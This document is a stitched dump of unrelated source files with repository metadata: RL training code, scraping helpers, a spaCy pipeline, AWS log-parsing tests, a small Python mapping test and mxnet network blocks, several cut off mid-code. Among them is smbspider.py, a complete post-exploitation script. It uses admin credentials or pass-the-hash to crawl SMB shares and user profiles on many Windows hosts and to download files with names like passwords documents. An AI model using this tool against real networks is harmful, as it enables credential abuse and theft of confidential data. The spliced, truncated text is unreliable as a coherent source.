"elite_ratio": 0.1, "population_size": 500, "alpha": 0.1, "device": device, "lower_bound": "???", "upper_bound": "???", "return_mean_elites": True } }) agent = planning.create_trajectory_optim_agent_for_model( 
model_env, agent_cfg, num_particles=20 ) train_losses = [] val_scores = [] # Create a trainer for the model model_trainer = models.ModelTrainer(dynamics_model, optim_lr=1e-3, weight_decay=5e-5) # Create visualization objects fig, axs = plt.subplots(1, 1, figsize=(14, 3.75)) ax_text = axs.text(300, 50, "") # Main PETS loop all_rewards = [0] for trial in range(num_trials): obs = env.reset() agent.reset() done = False total_reward = 0.0 steps_trial = 0 while not done: # --------------- Model Training ----------------- if steps_trial == 0: dynamics_model.update_normalizer(replay_buffer.get_all()) # update normalizer stats dataset_train, dataset_val = replay_buffer.get_iterators( batch_size=cfg.overrides.model_batch_size, val_ratio=cfg.overrides.validation_ratio, train_ensemble=True, ensemble_size=ensemble_size, shuffle_each_epoch=True, bootstrap_permutes=False, # build bootstrap dataset using sampling with replacement ) model_trainer.train( dataset_train, dataset_val=dataset_val, num_epochs=50, patience=50, callback=train_callback) # --- Doing env step using the agent and adding to model dataset --- next_obs, reward, done, _ = common_util.step_env_and_add_to_buffer(env, obs, agent, {}, replay_buffer) obs = next_obs total_reward += reward steps_trial += 1 if steps_trial == trial_length: break all_rewards.append(total_reward) env.save_trajectory(f"dubins_{trial}.png") print(all_rewards) plot_graph(axs, None, ax_text, trial, steps_trial, all_rewards, force_update=True) # fig.savefig("dubins.png")
2.046875
2
pixiv_spider/__init__.py
Uzukidd/Pixiv-spider
1
16789
<reponame>Uzukidd/Pixiv-spider<gh_stars>1-10 # from pixiv_web_crawler import Getters
1.117188
1
parsers/parsers_base.py
xm4dn355x/async_test
0
16790
#
# Shared helper functions used by every parser.
#
# Author: <NAME>
# License: MIT License
#

from time import sleep
import requests


def get_htmls(urls):
    """Download every URL in *urls* and return the HTML documents.

    A one-second pause between requests keeps the crawl polite.

    :param urls: list of URL strings
    :type urls: list
    :return: list with one HTML document per URL, in input order
    """
    pages = []
    for url in urls:
        pages.append(get_html(url))
        sleep(1)
    return pages


def get_html(url):
    """Fetch a single URL and return the response body.

    :param url: URL string
    :type url: str
    :return: the HTML document as text
    """
    print(f"""get_html url={url}""")
    response = requests.get(url, headers={'User-Agent': 'Custom'})
    print(response)  # server reply, e.g. <Response [200]>
    return response.text


if __name__ == '__main__':
    pass
3.046875
3
smbspider/smbspider.py
vonahi/pentesting_scripts
13
16791
#!/usr/bin/python # # This post-exploitation script can be used to spider numerous systems # to identify sensitive and/or confidential data. A good scenario to # use this script is when you have admin credentials to tons of # Windows systems, and you want to look for files containing data such # as PII, network password documents, etc. For the most part, # this script uses smbclient, parses the results, and prints # out the results in a nice format for you. # # Author: <NAME> <<EMAIL> # Version: 2.4 # Updated: 01/23/2014 # import commands, time, getopt, re, os from sys import argv start_time = time.time() class colors: red = "\033[1;31m" blue = "\033[1;34m" norm = "\033[0;00m" green = "\033[1;32m" banner = "\n " + "*" * 56 banner += "\n * _ *" banner += "\n * | | // \\\\ *" banner += "\n * ___ _ __ ___ | |__ _\\\\()//_ *" banner += "\n * / __| '_ ` _ \| '_ \ / // \\\\ \ *" banner += "\n * \__ \ | | | | | |_) | |\__/| *" banner += "\n * |___/_| |_| |_|_.__/ *" banner += "\n * *" banner += "\n * SMB Spider v2.4, <NAME> (<EMAIL>) *" banner += "\n " + "*" * 56 + "\n" def help(): print banner print " Usage: %s <OPTIONS>" % argv[0] print colors.red + "\n Target(s) (required): \n" + colors.norm print "\t -h <host>\t Provide IP address or a text file containing IPs." print "\t\t\t Supported formats: IP, smb://ip/share, \\\\ip\\share\\" print colors.red + "\n Credentials (required): \n" + colors.norm print "\t -u <user>\t Specify a valid username to authenticate to the system(s)." print "\t -p <pass>\t Specify the password which goes with the username." print "\t -P <hash>\t Use -P to provide password hash if cleartext password isn't known." print "\t -d <domain>\t If using a domain account, provide domain name." print colors.green + "\n Shares (optional):\n" + colors.norm print "\t -s <share>\t Specify shares (separate by comma) or specify \"profile\" to spider user profiles." print "\t -f <file>\t Specify a list of shares from a file." 
print colors.green + "\n Other (optional):\n" + colors.norm print "\t -w \t\t Avoid verbose output. Output successful spider results to smbspider_host_share_user.txt." print "\t\t\t This option is HIGHLY recommended if numerous systems are being scanned." print "\t -n \t\t ** Ignore authentication check prior to spidering." print "\t -g <file> \t Grab (download) files that match strings provided in text file. (Case sensitive.)" print "\t\t\t ** Examples: *assword.doc, *assw*.doc, pass*.xls, etc." print colors.norm exit() def start(argv): if len(argv) < 1: help() try: opts, args = getopt.getopt(argv, "u:p:d:h:s:f:P:wng:") except getopt.GetoptError, err: print colors.red + "\n [-] Error: " + str(err) + colors.norm # set default variables to prevent errors later in script sensitive_strings = [] smb_user = "" smb_pass = "" smb_domain = "" smb_host = [] smb_share = ["profile"] pth = False output = False unique_systems = [] ignorecheck = False inputfile = False #parse through arguments for opt, arg in opts: if opt == "-u": smb_user = arg elif opt == "-p": smb_pass = arg elif opt == "-d": smb_domain = arg elif opt == "-h": try: smb_host = open(arg).read().split('\n') inputfile = True except: if "\\\\" in arg and "\\" not in arg[-1:]: test = arg[2:].replace("\\","\\") smb_host.append("\\\\%s\\" % test) else: smb_host.append(arg) elif opt == "-f": smb_share = open(arg).read().split() elif opt == "-s": smb_share = arg.split(',') elif opt == "-P": if arg[-3:] == ":::": arg = arg[:-3] smb_pass = arg pth = True elif opt == "-w": output = True elif opt == "-n": ignorecheck = True elif opt == "-g": sensitive_strings = open(arg).read().split("\n")[:-1] #check options before proceeding if (not smb_user or not smb_pass or not smb_host): print colors.red + "\n [-] " + colors.norm + "Error: Please check to ensure that all required options are provided." 
help() if pth: result = commands.getoutput("pth-smbclient") if "not found" in result.lower(): print colors.red + "\n [-] " + colors.norm + "Error: The passing-the-hash package was not found. Therefore, you cannot pass hashes." print "Please run \"apt-get install passing-the-hash\" to fix this error and try running the script again.\n" exit() #make smb_domain, smb_user, and smb_pass one variable if smb_domain: credentials = smb_domain + "\\\\" + smb_user + " " + smb_pass else: credentials = smb_user + " " + smb_pass for system in smb_host: if "\\" in system or "//" in system: if "\\" in system: sys = system[system.find("\\")+2:] sys = sys[:sys.find("\\")] else: sys = system[system.find("/")+2:] sys = sys[:sys.find("/")] if sys not in unique_systems: unique_systems.append(sys) else: unique_systems.append(system) #start spidering print banner unique_systems = [i for i in unique_systems if i != ''] #remove blank elements from list print " [*] Spidering %s system(s)..." % len(unique_systems) begin = spider(credentials, smb_host, smb_share, pth, output, ignorecheck, inputfile, sensitive_strings) begin.start_spidering() class spider: def __init__(self, credentials, hosts, shares, pth, output, ignorecheck, inputfile, sensitive_strings): self.list_of_hosts = hosts self.list_of_shares = shares self.credentials = credentials self.smb_host = "" self.smb_share = "" self.skip_host = "" self.pth = pth self.outputfile = output self.blacklisted = [] self.ignorecheck = ignorecheck self.inputfile = inputfile self.smb_download = True self.file_locations = [] self.sensitive_strings = sensitive_strings self.profile = False def start_spidering(self): share = "" self.total_hosts = 0 empty_share_error = colors.red + " [-] " + colors.norm + "Error: Empty share detected for host %s. Skipping share." 
for test_host in self.list_of_hosts: temp = test_host if ("//" in temp or "\\\\" in temp) and self.list_of_shares[0] != "profile": print colors.red + " [-] " + colors.norm + "Error: You cannot specify a share if your target(s) contains \\\\<ip>\\<share> or //<ip>/<share>\n" exit() for host in self.list_of_hosts: self.total_hosts += 1 tmp_share = host.replace("/","") tmp_share = host.replace("\\","") orig_host = host # ensures that we can check the original host value later on if we need to if "\\\\" in host: # this checks to see if host is in the format of something like \\192.168.0.1\C$ host = host[2:] host = host[:host.find("\\")] elif "smb://" in host: # this checks to see if the host contains a format such as smb://192.168.0.1/C$ host = host[6:] host = host[:host.find("/")] if self.skip_host == host: self.blacklisted.append(host) continue if len(self.list_of_shares) == 1 and ("//" in orig_host or "\\\\" in orig_host): if "//" in orig_host: share = orig_host[orig_host.rfind("/")+1:] elif "\\\\" in orig_host: if orig_host[-1] == "\\": temp = orig_host[:-1] share = temp[temp.rfind("\\")+1:] self.smb_host = host self.smb_share = share else: for share in self.list_of_shares: if self.skip_host == host: self.blacklisted.append(host) break self.smb_host = host self.smb_share = share tmp_share = tmp_share.replace(self.smb_host,"") tmp_share = tmp_share.replace("smb:///","") if len(tmp_share) == 0 and (self.smb_share != "profile" and len(self.smb_share) == 0): print empty_share_error % self.smb_host continue if len(self.list_of_shares) > 1: for x in self.list_of_shares: self.smb_share = x print "\n [*] Attempting to spider smb://%s/%s" % (self.smb_host, self.smb_share.replace("profile","<user profiles>")) self.spider_host() else: print "\n [*] Attempting to spider smb://%s/%s " % (self.smb_host, self.smb_share.replace("profile","<user profiles>")) self.spider_host() if self.list_of_shares[0] == "profile": if self.inputfile: print " [*] Finished with smb://%s/<user 
profiles>. [Remaining: %s] " % (self.smb_host, str(len(self.list_of_hosts)-self.total_hosts-1)) else: print " [*] Finished with smb://%s/<user profiles>. [Remaining: %s] " % (self.smb_host, str(len(self.list_of_hosts)-self.total_hosts)) else: print " [*] Finished with smb://%s/%s. [Remaining: %s] " % (self.smb_host, self.smb_share, str(len(self.list_of_hosts)-self.total_hosts)) if self.smb_download: self.start_downloading() def start_downloading(self): if len(self.sensitive_strings) == 0: return print "\n" + colors.blue + " [*] " + colors.norm + "Attempting to download files that were deemed sensitive." if not os.path.exists('smbspider-downloads'): os.makedirs('smbspider-downloads') for f in self.file_locations: host = f[2:] host = str(host[:host.find("\\")]) share = f[len(host)+3:] share = share[:share.find("\\")] full_path = f.replace("\\\\%s\\%s\\" % (host, share), "").strip() file_name = full_path[full_path.rfind("\\")+1:] for s in self.sensitive_strings: if s in file_name: result = commands.getoutput("%s -c \"get \\\"%s\\\" \\\"%s_%s\\\"\" //%s/%s -U %s " % (self.smbclient(), full_path.replace("\\","\\\\"), \ host,file_name, host, share, self.credentials)) print colors.blue + " [*] " + colors.norm + "Downloaded: %s from smb://%s/%s" % (file_name, host, share) commands.getoutput("mv \"%s_%s\" \"smbspider-downloads/%s\"" % (host, file_name, host, file_name)) else: temp_file = s.split("*") all_match = 0 for tmp in temp_file: if tmp in full_path: all_match = 1 else: all_match = 0 break if all_match == 1: result = commands.getoutput("%s -c \"get \\\"%s\\\" \\\"%s_%s\\\"\" //%s/%s -U %s " % (self.smbclient(), full_path.replace("\\","\\\\"), \ host,file_name, host, share, self.credentials)) print colors.blue + " [*] " + colors.norm + "Downloaded: %s from smb://%s/%s" % (file_name, host, share) commands.getoutput("mv \"%s_%s\" \"smbspider-downloads/%s_%s\"" % (host, file_name, host, file_name)) def parse_result(self, result): 
############################################################ # this small section removes all of the unnecessary crap. a bit ugly, i know! :x errors = ["O_SUCH_F","ACCESS_DEN", "US_OBJECT_NAME_IN", "US_INVALID_NETWORK_RE", "CT_NAME_NOT", "not present","CONNECTION_REFUSED" ] result = result.split('\n') purge = [] trash = [" . ", " .. ", "Domain=", " D", "blocks of size", "wrapper called", "Substituting user supplied"] for num in range(0,len(result)): for d in trash: if d in result[num] or len(result[num]) < 2: purge.append(num) purge = list(set(purge)) purge = sorted(purge, reverse=True) for i in purge: del result[i] ############################################################ directory = "" filename = "" file_locations = [] file_change = False for x in result: if x[0] == "\\": directory = x file_change = False else: filename = x[2:] filename = filename[:filename.find(" ")] file_change = True fail = 0 if not file_change: continue for error in errors: if error in filename: fail = 1 if fail == 0 and len(filename) > 0: if not self.outputfile: file_complete_path = "\\\\%s\%s" % (self.smb_host,self.smb_share) + directory + "\\" + filename print colors.blue + " [*] " + colors.norm + file_complete_path else: if not os.path.exists('smbspider'): os.makedirs('smbspider') if self.profile: lawl_share = "profile" else: lawl_share = self.smb_share output = open("smbspider/smbspider_%s_%s_%s.txt" % (self.smb_host, lawl_share, self.credentials.split()[0]), 'a') file_complete_path = colors.blue + " [*] " + colors.norm + "\\\\%s\%s" % (self.smb_host,lawl_share) + directory + "\\" + filename + "\n" output.write(file_complete_path) output.close() if self.smb_download: self.file_locations.append(file_complete_path[file_complete_path.find("\\\\"):]) def fingerprint_fs(self): result = commands.getoutput("%s -c \"ls Users\\*\" //%s/C$ -U %s" % (self.smbclient(), self.smb_host, self.credentials)).split() if self.check_errors(result[-1]): return "error" if "NT_STATUS_OBJECT_NAME_NOT_FOUND" 
in result: return "old" else: return "new" def find_users(self, result): result = result.split('\n') purge = [] users = [] for num in range(0,len(result)): # cleans some stuff up a bit. if " . " in result[num] or " .. " in result[num] or "Domain=" in result[num]\ or len(result[num]) < 2 or "blocks of size" in result[num]: purge.append(num) purge = sorted(purge, reverse=True) for i in purge: del result[i] #clean up users list a little bit for i in result: user = i[:i.find(" D")] user = user[2:user.rfind(re.sub(r'\W+', '', user)[-1])+1] users.append(user) return users def check_errors(self, result): access_error = { "UNREACHABLE":" [-] Error [%s]: Check to ensure that host is online and that share is accessible." % self.smb_host, "UNSUCCESSFUL":" [-] Error [%s]: Check to ensure that host is online and that share is accessible." % self.smb_host, "TIMEOUT":" [-] Error [%s]: Check to ensure that host is online and that share is accessible." % self.smb_host, "LOGON_SERVER":" [-] Error %s Cannot contact logon server. Skipping host." % self.smb_host } for err in access_error: if err in result: print colors.red + access_error[err] + colors.norm self.skip_host = self.smb_host return True if "LOGON_FAIL" in result.split()[-1] and not self.ignorecheck: print colors.red + " [-] " + colors.norm + "Error [%s]: Invalid credentials. Please correct credentials and try again." % self.smb_host exit() elif "ACCESS_DENIED" in result.split()[-1]: print colors.red + " [-] " + colors.norm + "Error [%s]: Valid credentials, but no access. Try another account." 
% self.smb_host elif "BAD_NETWORK" in result.split()[-1] or "CONNECTION_REFUSED" in result.split()[-1]: print colors.red + " [-] " + colors.norm + "Error: Invalid share -> smb://%s/%s" % (self.smb_host,self.smb_share) return True def smbclient(self): if self.pth: return "pth-smbclient" else: return "smbclient" def spider_host(self): if self.smb_share.lower() == "profile": self.smb_share = "C$" self.profile = True if self.fingerprint_fs() == "error": return elif self.fingerprint_fs() == "old": folders = ['My Documents','Desktop','Documents'] result = commands.getoutput("%s -c \"ls \\\"Documents and Settings\\*\" //%s/C$ -U %s" % (self.smbclient(), self.smb_host, self.credentials)) if self.check_errors(result): return users = self.find_users(result) for user in users: for folder in folders: result = commands.getoutput("%s -c \"recurse;ls \\\"Documents and Settings\\%s\\%s\" //%s/C$ -U %s"\ % (self.smbclient(), user, folder, self.smb_host, self.credentials)) self.parse_result(result) else: folders = ['Documents','Desktop','Music','Videos','Downloads','Pictures'] result = commands.getoutput("%s -c \"ls \\\"Users\\*\" //%s/C$ -U %s" % (self.smbclient(), self.smb_host, self.credentials)) if self.check_errors(result): return users = self.find_users(result) for user in users: for folder in folders: result = commands.getoutput("%s -c \"recurse;ls \\\"Users\\%s\\%s\" //%s/C$ -U %s" % (self.smbclient(), user, folder, self.smb_host, self.credentials)) self.parse_result(result) else: result = commands.getoutput("%s -c \"recurse;ls\" \"//%s/%s\" -U %s" % (self.smbclient(), self.smb_host, self.smb_share, self.credentials)) if self.check_errors(result): return self.parse_result(result) if __name__ == "__main__": try: start(argv[1:]) except KeyboardInterrupt: print "\nExiting. Interrupted by user (ctrl-c)." exit() except Exception, err: print err exit() print "\n-----" print "Completed in: %.1fs" % (time.time() - start_time)
2.90625
3
api-inference-community/docker_images/spacy/app/pipelines/text_classification.py
mlonaws/huggingface_hub
362
16792
import os
import subprocess
import sys
from typing import Dict, List

from app.pipelines import Pipeline


class TextClassificationPipeline(Pipeline):
    """Text-classification pipeline backed by a spaCy model fetched from the
    Hugging Face Hub at construction time."""

    def __init__(
        self,
        model_id: str,
    ):
        # At the time, only public models from spaCy are allowed in the inference API.
        # model_id must look like "<namespace>/<model_name>".
        full_model_path = model_id.split("/")
        if len(full_model_path) != 2:
            raise ValueError(
                f"Invalid model_id: {model_id}. It should have a namespace (:namespace:/:model_name:)"
            )
        namespace, model_name = full_model_path
        # spaCy models are published as wheels; install the wheel straight
        # from the Hub into the current interpreter.
        package = f"https://huggingface.co/{namespace}/{model_name}/resolve/main/{model_name}-any-py3-none-any.whl"
        # PIP_CACHE must be set in the environment; a KeyError here means the
        # container is misconfigured.
        cache_dir = os.environ["PIP_CACHE"]
        subprocess.check_call(
            [sys.executable, "-m", "pip", "install", "--cache-dir", cache_dir, package]
        )
        # Imported lazily: spacy only becomes importable after the wheel
        # above (which pulls in spaCy as a dependency) has been installed.
        import spacy

        self.model = spacy.load(model_name)

    def __call__(self, inputs: str) -> List[List[Dict[str, float]]]:
        """
        Args:
            inputs (:obj:`str`):
                a string containing some text
        Return:
            A :obj:`list`:. The object returned should be a list of one list like
            [[{"label": "POSITIVE", "score": 0.9939950108528137}]] containing:
            - "label": A string representing what the label/class is. There can be multiple labels.
            - "score": A score between 0 and 1 describing how confident the model is for this label/class.
        """
        doc = self.model(inputs)
        categories = []
        # doc.cats maps each text-categorizer label to its confidence score.
        for cat, score in doc.cats.items():
            categories.append({"label": cat, "score": score})
        return [categories]
2.625
3
aws/logs_monitoring/tests/test_cloudtrail_s3.py
rkitron/datadog-serverless-functions
232
16793
"""Test that a gzipped CloudTrail record fetched from S3 is parsed and
enriched correctly by the forwarder's ``parsing`` and ``lambda_function``
modules."""
from unittest.mock import MagicMock, patch
import os
import sys
import unittest
import json
import copy
import io
import gzip

# Stub out every third-party dependency BEFORE importing the modules under
# test, so that ``import lambda_function`` / ``import parsing`` below do not
# require the real Datadog / requests packages.
sys.modules["trace_forwarder.connection"] = MagicMock()
sys.modules["datadog_lambda.wrapper"] = MagicMock()
sys.modules["datadog_lambda.metric"] = MagicMock()
sys.modules["datadog"] = MagicMock()
sys.modules["requests"] = MagicMock()
sys.modules["requests_futures.sessions"] = MagicMock()

# The modules under test read these env vars at import time, so the patch
# must be active while they are imported and can be stopped right after.
env_patch = patch.dict(
    os.environ,
    {
        "DD_API_KEY": "11111111111111111111111111111111",
        "DD_ADDITIONAL_TARGET_LAMBDAS": "ironmaiden,megadeth",
    },
)
env_patch.start()
import lambda_function
import parsing

env_patch.stop()


class Context:
    # Minimal stand-in for the AWS Lambda context object; only the
    # attributes read by the code under test are provided.
    function_version = 0
    invoked_function_arn = "invoked_function_arn"
    function_name = "function_name"
    memory_limit_in_mb = "10"


# A single CloudTrail "DescribeTable" management event, in the shape
# CloudTrail writes to S3 (a dict with a "Records" list).
test_data = {
    "Records": [
        {
            "eventVersion": "1.08",
            "userIdentity": {
                "type": "AssumedRole",
                "principalId": "AROAYYB64AB3HGPQO2EPR:DatadogAWSIntegration",
                "arn": "arn:aws:sts::601427279990:assumed-role/Siti_DatadogAWSIntegrationRole/i-08014e4f62ccf762d",
                "accountId": "601427279990",
                "accessKeyId": "ASIAYYB64AB3DWOY7JNT",
                "sessionContext": {
                    "sessionIssuer": {
                        "type": "Role",
                        "principalId": "AROAYYB64AB3HGPQO2EPR",
                        "arn": "arn:aws:iam::601427279990:role/Siti_DatadogAWSIntegrationRole",
                        "accountId": "601427279990",
                        "userName": "Siti_DatadogAWSIntegrationRole",
                    },
                    "attributes": {
                        "creationDate": "2021-05-02T23:49:01Z",
                        "mfaAuthenticated": "false",
                    },
                },
            },
            "eventTime": "2021-05-02T23:53:28Z",
            "eventSource": "dynamodb.amazonaws.com",
            "eventName": "DescribeTable",
            "awsRegion": "us-east-1",
            "sourceIPAddress": "172.16.31.10",
            "userAgent": "Datadog",
            "requestParameters": {"tableName": "KinesisClientLibraryLocal"},
            "responseElements": None,
            "requestID": "A9K7562IBO4MPDQE4O5G9QETRFVV4KQNSO5AEMVJF66Q9ASUAAJG",
            "eventID": "a5dd11f9-f616-4ea8-8030-0b3eef554352",
            "readOnly": True,
            "resources": [
                {
                    "accountId": "601427279990",
                    "type": "AWS::DynamoDB::Table",
                    "ARN": "arn:aws:dynamodb:us-east-1:601427279990:table/KinesisClientLibraryLocal",
                }
            ],
            "eventType": "AwsApiCall",
            "apiVersion": "2012-08-10",
            "managementEvent": True,
            "recipientAccountId": "601427279990",
            "eventCategory": "Management",
        }
    ]
}


def test_data_gzipped() -> io.BytesIO:
    """Return the test event gzipped, as CloudTrail stores it in S3.

    A deep copy is compressed so later mutation of ``test_data`` by the
    tests cannot affect the fixture."""
    return io.BytesIO(
        gzip.compress(json.dumps(copy.deepcopy(test_data)).encode("utf-8"))
    )


class TestS3CloudwatchParsing(unittest.TestCase):
    def setUp(self):
        # Show full dict diffs on assertEqual failures.
        self.maxDiff = 9000

    # patch decorators are applied bottom-up, so the mocks arrive in the
    # order (lambda_boto3, parsing_boto3).
    @patch("parsing.boto3")
    @patch("lambda_function.boto3")
    def test_s3_cloudtrail_pasing_and_enrichment(self, lambda_boto3, parsing_boto3):
        # NOTE(review): "pasing" is a typo for "parsing" in the test name;
        # harmless, but could be renamed.
        context = Context()

        # Make the mocked S3 client hand back the gzipped CloudTrail blob.
        boto3 = parsing_boto3.client()
        boto3.get_object.return_value = {"Body": test_data_gzipped()}

        # S3 event-notification payload pointing at the fake object.
        payload = {
            "s3": {
                "bucket": {
                    "name": "test-bucket",
                },
                "object": {
                    "key": "<KEY>"
                },
            }
        }

        result = parsing.parse({"Records": [payload]}, context)

        # The parser should return the original record plus Datadog metadata.
        expected = copy.deepcopy([test_data["Records"][0]])
        expected[0].update(
            {
                "ddsource": "cloudtrail",
                "ddsourcecategory": "aws",
                "service": "cloudtrail",
                "aws": {
                    "s3": {
                        "bucket": payload["s3"]["bucket"]["name"],
                        "key": payload["s3"]["object"]["key"],
                    },
                    "function_version": context.function_version,
                    "invoked_function_arn": context.invoked_function_arn,
                },
            }
        )

        # Tags are present but not asserted on in this test.
        result[0].pop("ddtags")

        # expected parsed result, now testing enrichment
        self.assertEqual(expected[0], result[0])

        # Enrichment should derive the host from the assumed-role ARN.
        expected[0]["host"] = "i-08014e4f62ccf762d"
        self.assertEqual(expected[0], lambda_function.enrich(result)[0])


if __name__ == "__main__":
    unittest.main()
1.945313
2
ch_06/tests/test_lookup_mapping.py
real-slim-chadi/Python-Object-Oriented-Programming---4th-edition
43
16794
"""
Python 3 Object-Oriented Programming

Chapter 6, Abstract Base Classes and Operator Overloading
"""
from lookup_mapping import Lookup


def test_lookup_mapping():
    # Keys are deliberately supplied out of order; Lookup is expected to
    # expose them sorted.
    pairs = [
        ["z", "Zillah"],
        ["a", "Amy"],
        ["c", "Clara"],
        ["b", "Basil"],
    ]
    lookup = Lookup(pairs)

    # Membership protocol (__contains__).
    assert "a" in lookup
    assert "d" not in lookup
    # Sizing protocol (__len__).
    assert len(lookup) == 4
    # Item access (__getitem__).
    assert lookup["a"] == "Amy"
    assert lookup["z"] == "Zillah"
    # Iteration yields keys in sorted order.
    assert list(lookup) == ["a", "b", "c", "z"]
3.234375
3
serempre_todo/utils/choices.py
pygabo/Serempre
0
16795
# Choice lists of (stored value, human-readable label) pairs for tasks.

# Lifecycle states a task moves through.
_STATUS_LABELS = {
    'TD': 'To Do',
    'IP': 'In Progress',
    'QA': 'Testing',
    'DO': 'Done',
}

# Priority levels a task can be assigned.
_PRIORITY_LABELS = {
    'ME': 'Medium',
    'HI': 'Highest',
    'HG': 'High',
    'LO': 'Lowest',
}

TASK_STATUS = list(_STATUS_LABELS.items())

TASK_PRIORITY = list(_PRIORITY_LABELS.items())
1.671875
2
symbols/block.py
zerofo/sdu-face-alignment
192
16796
"""Symbolic building blocks (ResNet / HPM / Inception-style / CAB units)
used to assemble the face-alignment network.

Every function here only *builds* an mxnet symbol graph (mx.sym /
mx.symbol); nothing is executed at call time.  Shared hyper-parameters
(bn_mom, workspace, ACT_BIT, memonger, net_block) come from the
project-level ``config`` object.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import mxnet as mx
import numpy as np
from config import config


def Conv(**kwargs):
    # Thin alias for mx.sym.Convolution so call sites stay short.
    body = mx.sym.Convolution(**kwargs)
    return body


def Act(data, act_type, name):
    # PReLU is only available via LeakyReLU(act_type='prelu'); every other
    # activation goes through the generic Activation operator.
    if act_type == 'prelu':
        body = mx.sym.LeakyReLU(data=data, act_type='prelu', name=name)
    else:
        body = mx.symbol.Activation(data=data, act_type=act_type, name=name)
    return body


def ConvFactory(data, num_filter, kernel, stride=(1, 1), pad=(0, 0), act_type="relu", mirror_attr={}, with_act=True, dcn=False, name=''):
    # Conv -> BatchNorm -> (optional) activation.  When dcn=True the plain
    # convolution is replaced by a 3x3 deformable convolution whose offsets
    # are predicted by an auxiliary conv (18 = 2 offsets * 3*3 kernel taps).
    # NOTE(review): mirror_attr={} is a mutable default argument and is only
    # referenced by the commented-out Activation call below -- confirm it
    # can be dropped.
    bn_mom = config.bn_mom
    workspace = config.workspace
    if not dcn:
        conv = mx.symbol.Convolution(
            data=data, num_filter=num_filter, kernel=kernel, stride=stride, pad=pad,
            no_bias=True, workspace=workspace, name=name+'_conv')
    else:
        conv_offset = mx.symbol.Convolution(name=name+'_conv_offset', data=data,
            num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
        conv = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=data, offset=conv_offset,
            num_filter=num_filter, pad=(1, 1), kernel=(3, 3), num_deformable_group=1, stride=stride, dilate=(1, 1), no_bias=False)
    bn = mx.symbol.BatchNorm(data=conv, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name+'_bn')
    if with_act:
        act = Act(bn, act_type, name=name+'_relu')
        #act = mx.symbol.Activation(
        #    data=bn, act_type=act_type, attr=mirror_attr, name=name+'_relu')
        return act
    else:
        return bn


def conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
    """Pre-activation residual bottleneck: three BN -> Act -> Conv stages
    (1x1 half-width, 3x3 half-width, 1x1 full-width) plus a shortcut.

    binarize=True swaps the float conv/act pairs for quantized
    QConvolution / QActivation ops.  dim_match=True uses the identity
    shortcut; otherwise a 1x1 (Q)conv projects the input.
    NOTE(review): the ``dcn`` and ``dilate`` arguments are accepted but
    unused in this unit -- presumably kept to match the other units'
    signatures; confirm.
    """
    bit = 1
    ACT_BIT = config.ACT_BIT
    bn_mom = config.bn_mom
    workspace = config.workspace
    memonger = config.memonger
    #print('in unit2')
    # the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper
    bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
    if not binarize:
        act1 = Act(data=bn1, act_type='relu', name=name + '_relu1')
        conv1 = Conv(data=act1, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0),
                     no_bias=True, workspace=workspace, name=name + '_conv1')
    else:
        act1 = mx.sym.QActivation(data=bn1, act_bit=ACT_BIT, name=name + '_relu1', backward_only=True)
        conv1 = mx.sym.QConvolution(data=act1, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0),
                                    no_bias=True, workspace=workspace, name=name + '_conv1', act_bit=ACT_BIT, weight_bit=bit)
    bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
    if not binarize:
        act2 = Act(data=bn2, act_type='relu', name=name + '_relu2')
        conv2 = Conv(data=act2, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
                     no_bias=True, workspace=workspace, name=name + '_conv2')
    else:
        act2 = mx.sym.QActivation(data=bn2, act_bit=ACT_BIT, name=name + '_relu2', backward_only=True)
        conv2 = mx.sym.QConvolution(data=act2, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
                                    no_bias=True, workspace=workspace, name=name + '_conv2', act_bit=ACT_BIT, weight_bit=bit)
    bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
    if not binarize:
        act3 = Act(data=bn3, act_type='relu', name=name + '_relu3')
        conv3 = Conv(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
                     no_bias=True, workspace=workspace, name=name + '_conv3')
    else:
        act3 = mx.sym.QActivation(data=bn3, act_bit=ACT_BIT, name=name + '_relu3', backward_only=True)
        conv3 = mx.sym.QConvolution(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
                                    no_bias=True, workspace=workspace, name=name + '_conv3', act_bit=ACT_BIT, weight_bit=bit)
    #if binarize:
    #  conv3 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
    if dim_match:
        shortcut = data
    else:
        # Projection shortcut built from the shared first activation.
        if not binarize:
            shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
                            workspace=workspace, name=name+'_sc')
        else:
            shortcut = mx.sym.QConvolution(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0),
                                           no_bias=True, workspace=workspace, name=name + '_sc', act_bit=ACT_BIT, weight_bit=bit)
    if memonger:
        # Memory-optimization hint consumed by mxnet's memonger pass.
        shortcut._set_attr(mirror_stage='True')
    return conv3 + shortcut


def conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilation, **kwargs):
    """HPM unit: three chained BN -> Act -> 3x3 Conv stages with widths
    num_filter*0.5, *0.25, *0.25 whose outputs are concatenated back to
    num_filter channels, plus a (projected) shortcut.

    Supports binarized (Q*) ops, deformable convolutions (dcn) and
    dilation; with the given padding the spatial size is preserved.
    """
    bit = 1
    ACT_BIT = config.ACT_BIT
    bn_mom = config.bn_mom
    workspace = config.workspace
    memonger = config.memonger
    #print('in unit2')
    # the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper
    bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
    if not binarize:
